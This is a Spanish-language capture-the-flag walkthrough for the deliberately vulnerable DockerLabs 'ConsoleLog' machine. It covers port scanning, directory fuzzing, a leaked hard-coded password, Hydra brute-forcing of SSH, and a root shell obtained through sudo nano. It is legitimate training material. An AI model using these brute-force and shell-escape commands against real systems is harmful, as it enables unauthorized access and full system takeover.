ConsoleLog DockerLabs (Easy)
Instalación
Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzip consolelog.zipNos lo descomprimira y despues montamos la maquina de la siguiente forma.
bash auto_deploy.sh consolelog.tarInfo:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarlaPor lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 14:19 EST
Nmap scan report for express.dl (172.17.0.2)
Host is up (0.000027s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.61 ((Debian))
|_http-server-header: Apache/2.4.61 (Debian)
|_http-title: Mi Sitio
3000/tcp open http Node.js Express framework
|_http-title: Error
5000/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 f8:37:10:7e:16:a2:27:b8:3a:6e:2c:16:35:7d:14:fe (ECDSA)
|_ 256 cd:11:10:64:60:e8:bf:d9:a4:f4:8e:ae:3b:d8:e1:8d (ED25519)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.61 secondsVemos que el SSH esta en el puerto 5000 de primeras, si entramos en el puerto 80 veremos una pagina aparentemente normal, pero si realizamos un poco de fuzzing veremos lo siguiente:
Gobuster
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 100 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 275]
/.htpasswd.html (Status: 403) [Size: 275]
/.htaccess.txt (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htaccess.html (Status: 403) [Size: 275]
/.htaccess.php (Status: 403) [Size: 275]
/.htpasswd.txt (Status: 403) [Size: 275]
/.htpasswd.php (Status: 403) [Size: 275]
/backend (Status: 200) [Size: 1563]
/index.html (Status: 200) [Size: 234]
/javascript (Status: 403) [Size: 275]
/server-status (Status: 403) [Size: 275]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================Vemos un directorio bastante interesante llamado /backend y si entramos dentro el unico archivo que nos va a interesar es el llamado server.js que contendra lo siguiente:
Escalate user lovely
const express = require('express');
const app = express();
const port = 3000;
app.use(express.json());
app.post('/recurso/', (req, res) => {
const token = req.body.token;
if (token === 'tokentraviesito') {
res.send('lapassworddebackupmaschingonadetodas');
} else {
res.status(401).send('Unauthorized');
}
});
app.listen(port, '0.0.0.0', () => {
console.log(`Backend listening at http://consolelog.lab:${port}`);
});Vemos que es una posible contraseña de algun usuario del sistema, por lo que intentaremos realizar fuerza bruta con hydra:
Hydra
hydra -L <WORDLIST> -p lapassworddebackupmaschingonadetodas ssh://<IP> -s 5000 -t 64 -I Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-21 14:28:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 624370 login tries (l:624370/p:1), ~9756 tries per task
[DATA] attacking ssh://172.17.0.2:5000/
[STATUS] 505.00 tries/min, 505 tries in 00:01h, 623907 to do in 20:36h, 22 active
[STATUS] 441.00 tries/min, 1323 tries in 00:03h, 623092 to do in 23:33h, 19 active
[STATUS] 383.00 tries/min, 2681 tries in 00:07h, 621736 to do in 27:04h, 17 active
[5000][ssh] host: 172.17.0.2 login: lovely password: lapassworddebackupmaschingonadetodas
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.Y vemos que obtenemos las credenciales del usuario lovely, por lo que nos conectaremos por ssh.
SSH
ssh lovely@<IP> -p 5000Metemos como contraseña lapassworddebackupmaschingonadetodas y veremos que estamos dentro como dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for lovely on 1db80b165ab8:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User lovely may run the following commands on 1db80b165ab8:
(ALL) NOPASSWD: /usr/bin/nanoVeremos que podemos ejecutar el binario nano como el usuario root por lo que haremos lo siguiente:
sudo nano
^R^X
reset; bash 1>&0 2>&0Info:
root@1db80b165ab8:/home/lovely# whoami
rootY con esto ya seremos root, por lo que habremos terminado la maquina.
Last updated